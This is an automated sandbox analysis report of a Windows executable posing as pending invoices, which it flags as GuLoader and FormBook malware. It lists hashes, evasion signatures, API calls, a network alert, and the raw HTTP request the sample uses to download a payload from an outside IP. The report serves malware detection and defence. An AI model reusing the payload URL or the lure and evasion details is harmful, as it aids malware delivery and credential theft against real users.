Windows Analysis Report
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe

Overview

General Information

Sample name: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
Analysis ID: 1587320
MD5: 4f2c796aebd02a54ca9bebb0c5bc5ef0
SHA1: 558e2f3de9077aaf9159c4fb1633d66c75b14dda
SHA256: c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692

Detection

FormBook, GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T07:13:13.846740+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49796 | 212.162.149.153 | 80 | TCP

      AV Detection

      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, Virustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, ReversingLabs: Detection: 42%
      Source: Yara match, File source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49796 -> 212.162.149.153:80
      Source: global traffic, HTTP traffic detected:
        GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 212.162.149.153
        Cache-Control: no-cache
      Source: unknown, TCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin(
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJ
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bink
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B0B

      E-Banking Fraud

      Source: Yara matchFile source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325235C0 NtCreateMutant,LdrInitializeThunk,3_2_325235C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B60 NtClose,LdrInitializeThunk,3_2_32522B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32522C70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_32522DF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523010 NtOpenDirectoryObject,3_2_32523010
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523090 NtSetValueKey,3_2_32523090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325239B0 NtGetContextThread,3_2_325239B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D70 NtOpenThread,3_2_32523D70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D10 NtOpenProcessToken,3_2_32523D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524340 NtSetContextThread,3_2_32524340
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524650 NtSuspendThread,3_2_32524650
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AD0 NtReadFile,3_2_32522AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AF0 NtWriteFile,3_2_32522AF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AB0 NtWaitForSingleObject,3_2_32522AB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BF0 NtAllocateVirtualMemory,3_2_32522BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BE0 NtQueryValueKey,3_2_32522BE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B80 NtQueryInformationFile,3_2_32522B80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BA0 NtEnumerateValueKey,3_2_32522BA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E30 NtWriteVirtualMemory,3_2_32522E30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EE0 NtQueueApcThread,3_2_32522EE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E80 NtReadVirtualMemory,3_2_32522E80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EA0 NtAdjustPrivilegesToken,3_2_32522EA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F60 NtCreateProcessEx,3_2_32522F60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F30 NtCreateSection,3_2_32522F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FE0 NtCreateFile,3_2_32522FE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F90 NtProtectVirtualMemory,3_2_32522F90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FB0 NtResumeThread,3_2_32522FB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FA0 NtQuerySection,3_2_32522FA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C60 NtCreateKey,3_2_32522C60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C00 NtQueryInformationProcess,3_2_32522C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CC0 NtQueryVirtualMemory,3_2_32522CC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CF0 NtOpenProcess,3_2_32522CF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CA0 NtQueryInformationToken,3_2_32522CA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D10 NtMapViewOfSection,3_2_32522D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D00 NtSetInformationFile,3_2_32522D00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D30 NtUnmapViewOfSection,3_2_32522D30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DD0 NtDelayExecution,3_2_32522DD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DB0 NtEnumerateKey,3_2_32522DB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 32525130 appears 58 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 3255EA12 appears 82 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 3256F290 appears 103 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 324DB970 appears 280 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 32537E54 appears 111 times
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: invalid certificate
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000000.00000000.2031772150.0000000000461000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003227F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032433000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000000.2333715520.0000000000461000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine Classification label: mal76.troj.evad.winEXE@3/6@0/1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00404060 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 0_2_00404060
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_0040234F LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_0040234F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nsgDAA0.tmp
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Virustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe ReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File read: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: unknown Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_6FA42351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FA42351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B135E push eax; iretd 3_2_324B1369
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B225F pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B27FA pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B283D push eax; iretd 3_2_324B2858
